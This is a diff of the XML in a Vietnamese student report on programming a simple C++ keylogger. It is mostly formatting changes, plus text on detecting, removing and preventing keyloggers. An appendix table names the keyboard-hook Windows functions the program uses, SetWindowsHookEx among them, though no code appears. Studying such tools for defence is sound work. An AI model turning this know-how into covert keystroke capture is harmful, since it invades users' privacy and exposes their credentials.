-        <w:t>– Không mở các tập tin với phần mở rộng có thể liên quan đến mã độc như .bat, .com, .exe, .pif, .vbs,…</w:t>
-      </w:r>
+        <w:t>– Không mở các tập tin với phần mở rộng có thể liên quan đến mã độc như .bat, .com, .exe, .pif, .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>vbs,…</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16421,8 +20099,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>– Không được tắt cơ chế kiểm soát an ninh mã độc như phần mềm diệt virus, phần mềm lọc nội dung, tường lửa,…</w:t>
-      </w:r>
+        <w:t xml:space="preserve">– Không được tắt cơ chế kiểm soát an ninh mã độc như phần mềm diệt virus, phần mềm lọc nội dung, tường </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lửa,…</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16863,6 +20551,160 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_Toc57761779"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. Cách xóa Keylogger khỏi máy tính</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="32"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Một số loại </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">eylogger dễ dàng được phát hiện và loại bỏ bởi phần mềm chống </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>virus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tốt nhất, nhưng một số loại khác có thể rất khó xác định và cách ly khỏi hệ thống. Đó là bởi vì nhiều </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dựa trên phần mềm được thiết kế giống như phần mềm hợp pháp và do đó có thể vượt qua hầu hết các chương trình chống </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>virus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoặc chống phần mềm độc hại. Tệ hơn nữa, một số </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> chạy ở cấp độ đặc quyền cao hơn so với phần mềm an ninh mạng tiêu chuẩn, khiến chúng không thể bị phát hiện và xóa.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="120" w:after="0"/>
         <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
@@ -16878,23 +20720,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>. Cách xóa Keylogger khỏi máy tính</w:t>
+        <w:t xml:space="preserve">Nếu bạn nghi ngờ rằng ai đó có thể đã cài đặt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> trên máy tính của bạn nhưng phần mềm chống phần mềm độc hại của bạn không phát hiện ra bất kỳ điều gì, bạn có thể tìm thấy nó trong Windows Task Manager. Chỉ cần khởi chạy Trình quản lý tác vụ và xem kỹ danh sách các quy trình đang hoạt động để xem có điều gì bất thường hay không. Nếu cần, hãy nhờ người am hiểu về công nghệ giúp bạn thực hiện bước này. Bạn cũng có thể kiểm tra tường lửa của hệ thống để tìm bất kỳ hoạt động đáng ngờ nào, chẳng hạn như lượng dữ liệu đến hoặc đi bất thường.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16921,39 +20763,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Một số loại </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">eylogger dễ dàng được phát hiện và loại bỏ bởi phần mềm chống </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>virus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tốt nhất, nhưng một số loại khác có thể rất khó xác định và cách ly khỏi hệ thống. Đó là bởi vì nhiều </w:t>
+        <w:t xml:space="preserve">Giống như tất cả các mối đe dọa mạng khác, cách tốt nhất để giữ an toàn trước các cuộc tấn công </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16969,23 +20779,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> dựa trên phần mềm được thiết kế giống như phần mềm hợp pháp và do đó có thể vượt qua hầu hết các chương trình chống </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>virus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hoặc chống phần mềm độc hại. Tệ hơn nữa, một số </w:t>
+        <w:t xml:space="preserve"> là sử dụng phần mềm chống vi-rút tốt nhất và chạy quét máy tính thường xuyên. Để đảm bảo rằng bạn được bảo vệ khỏi các mối đe dọa mới nhất, bạn nên định cấu hình chương trình chống vi-rút của mình để tự động tải xuống các bản cập nhật định nghĩa vi-rút. Cuối cùng, không mở bất kỳ liên kết hoặc tệp đính kèm nào có trong email đáng ngờ vì chúng có thể bắt đầu tải xuống "ẩn" </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17001,107 +20795,12 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> chạy ở cấp độ đặc quyền cao hơn so với phần mềm an ninh mạng tiêu chuẩn, khiến chúng không thể bị phát hiện và xóa.</w:t>
+        <w:t xml:space="preserve">, phần mềm gián điệp, phần mềm quảng cáo hoặc một số loại phần mềm độc hại khác. </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Nếu bạn nghi ngờ rằng ai đó có thể đã cài đặt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Keylogger</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> trên máy tính của bạn nhưng phần mềm chống phần mềm độc hại của bạn không phát hiện ra bất kỳ điều gì, bạn có thể tìm thấy nó trong Windows Task Manager. Chỉ cần khởi chạy Trình quản lý tác vụ và xem kỹ danh sách các quy trình đang hoạt động để xem có điều gì bất thường hay không. Nếu cần, hãy nhờ người am hiểu về công nghệ giúp bạn thực hiện bước này. Bạn cũng có thể kiểm tra tường lửa của hệ thống để tìm bất kỳ hoạt động đáng ngờ nào, chẳng hạn như lượng dữ liệu đến hoặc đi bất thường.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Giống như tất cả các mối đe dọa mạng khác, cách tốt nhất để giữ an toàn trước các cuộc tấn công </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Keylogger</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> là sử dụng phần mềm chống vi-rút tốt nhất và chạy quét máy tính thường xuyên. Để đảm bảo rằng bạn được bảo vệ khỏi các mối đe dọa mới nhất, bạn nên định cấu hình chương trình chống vi-rút của mình để tự động tải xuống các bản cập nhật định nghĩa vi-rút. Cuối cùng, không mở bất kỳ liên kết hoặc tệp đính kèm nào có trong email đáng ngờ vì chúng có thể bắt đầu tải xuống "ẩn" </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Keylogger</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, phần mềm gián điệp, phần mềm quảng cáo hoặc một số loại phần mềm độc hại khác. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -17119,24 +20818,31 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc57761780"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:tab/>
         <w:t>*/ Tiểu kết chương 3:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="33"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17223,8 +20929,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc43674119"/>
-      <w:bookmarkStart w:id="11" w:name="_Toc56805883"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc43674119"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc57761781"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17237,8 +20943,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>KẾT LUẬN</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="35"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17451,8 +21157,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc43674120"/>
-      <w:bookmarkStart w:id="13" w:name="_Toc56805884"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc43674120"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc57761782"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17465,8 +21171,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>TÀI LIỆU THAM KHẢO</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17702,8 +21408,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc43674121"/>
-      <w:bookmarkStart w:id="15" w:name="_Toc56805885"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc43674121"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc57761783"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17716,8 +21422,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>PHỤ LỤC</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="39"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17867,7 +21573,16 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>WinMain(),</w:t>
+              <w:t>WinMain(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>),</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17877,6 +21592,7 @@
               </w:rPr>
               <w:t>SetWindowsHookEx</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17887,6 +21603,7 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17901,10 +21618,20 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>(),</w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>),</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17919,7 +21646,16 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>()</w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17971,13 +21707,23 @@
                 <w:szCs w:val="28"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>ToUnicode()</w:t>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>ToUnicode(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>)</w:t>
             </w:r>
           </w:p>
         </w:tc>

--- a/Báo cáo Project 1 tạo Keylogger đơn giản.docx
+++ b/Báo cáo Project 1 tạo Keylogger đơn giản.docx
@@ -5128,25 +5128,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sự phát triển của mã độc hiện nay là vô cùng nhanh, đòi hỏi mỗi lập trình viên, những người quản trị hệ thống phải biết cách đối phó và ngăn chặn. Để làm được điều này, việc hiểu cấu trúc và cách thức hoạt động của nó là vô cùng quan trọng. Đối với em, một sinh viên có định hướng theo ngành </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>An</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> toàn thông tin, mã độc là một khía cạnh rất quan trọng bắt buộc phải có kiến thức vững vàng. Vì vậy, sau khi được nhà trường xếp thầy Phạm Huy Hoàng là giảng viên hướng dẫn, em đã quyết định lựa chọn đề tài: “Lập trình một Keylogger đơn giản bằng ngôn ngữ lập trình C++”.</w:t>
+        <w:t>Sự phát triển của mã độc hiện nay là vô cùng nhanh, đòi hỏi mỗi lập trình viên, những người quản trị hệ thống phải biết cách đối phó và ngăn chặn. Để làm được điều này, việc hiểu cấu trúc và cách thức hoạt động của nó là vô cùng quan trọng. Đối với em, một sinh viên có định hướng theo ngành An toàn thông tin, mã độc là một khía cạnh rất quan trọng bắt buộc phải có kiến thức vững vàng. Vì vậy, sau khi được nhà trường xếp thầy Phạm Huy Hoàng là giảng viên hướng dẫn, em đã quyết định lựa chọn đề tài: “Lập trình một Keylogger đơn giản bằng ngôn ngữ lập trình C++”.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5263,25 +5245,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Objective </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>C,…</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Điểm chung của các loại ngôn ngữ này là có thể can thiệp sâu vào phần cứng và có thể chạy đa nền tảng.</w:t>
+        <w:t>Objective C,… Điểm chung của các loại ngôn ngữ này là có thể can thiệp sâu vào phần cứng và có thể chạy đa nền tảng.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5564,16 +5528,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">những macro liên quan đến </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Keyboard,</w:t>
+        <w:t>những macro liên quan đến Keyboard,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5583,7 +5538,6 @@
         </w:rPr>
         <w:t>...</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5940,17 +5894,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
       <w:bookmarkStart w:id="15" w:name="_Toc57761763"/>
       <w:r>
         <w:rPr>
@@ -6051,17 +5994,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="28"/>
